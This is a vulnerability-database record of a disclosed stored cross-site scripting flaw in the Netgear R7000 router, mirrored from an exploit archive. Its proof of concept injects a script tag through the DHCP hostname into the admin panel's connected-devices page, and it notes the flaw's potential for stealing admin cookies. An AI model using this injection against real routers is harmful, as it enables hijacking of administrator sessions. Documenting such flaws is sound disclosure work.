Details of VAR-E-201612-0154

ID

VAR-E-201612-0154

EDB ID

40898

TITLE

Netgear R7000 - Cross-Site Scripting - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 40898

DESCRIPTION

Netgear R7000 - Cross-Site Scripting.. webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 40898

AFFECTED PRODUCTS

vendor:

netgear

model:

r7000

scope:

version:

Trust: 1.6

sources: EXPLOIT-DB: 40898 // EDBNET: 89493

EXPLOIT

# Exploit Title: Netgear R7000 - XSS via. DHCP hostname
# Date: 11-12-2016
# Exploit Author: Vincent Yiu
# Contact: https://twitter.com/vysecurity
# Vendor Homepage: https://www.netgear.com/
# Category: Hardware / WebApp
# Version: V1.0.7.2_1.1.93 + LATEST to date

-Vulnerability
An user who has access to send DHCP via either VPN or Wireless connection can serve a host name with script tags to trigger XSS.

Could be potentially used to connect to open or guest WIFI hotspot and inject stored XSS into admin panel and steal cookie for authentication.

http://RouterIP/start.htm

Then visit the "view who's connected" page.

-Proof Of Concept
Set /etc/dhcp/dhclient.conf

send host-name "<script>alert('xss')</script>";

Trust: 1.0

sources: EXPLOIT-DB: 40898

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 40898

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 40898

TYPE

Cross-Site Scripting

Trust: 1.6

sources: EXPLOIT-DB: 40898 // EDBNET: 89493

CREDITS

Vincent Yiu

Trust: 0.6

sources: EXPLOIT-DB: 40898

EXTERNAL IDS

db:	EXPLOIT-DB	id:	40898	Trust: 1.6
db:	EDBNET	id:	89493	Trust: 0.6

sources: EXPLOIT-DB: 40898 // EDBNET: 89493

REFERENCES

url:

https://www.exploit-db.com/exploits/40898/

Trust: 0.6

sources: EDBNET: 89493

SOURCES

db:	EXPLOIT-DB	id:	40898
db:	EDBNET	id:	89493

LAST UPDATE DATE

2022-07-27T09:54:03.642000+00:00

SOURCES RELEASE DATE

db:	EXPLOIT-DB	id:	40898	date:	2016-12-11T00:00:00
db:	EDBNET	id:	89493	date:	2016-12-11T00:00:00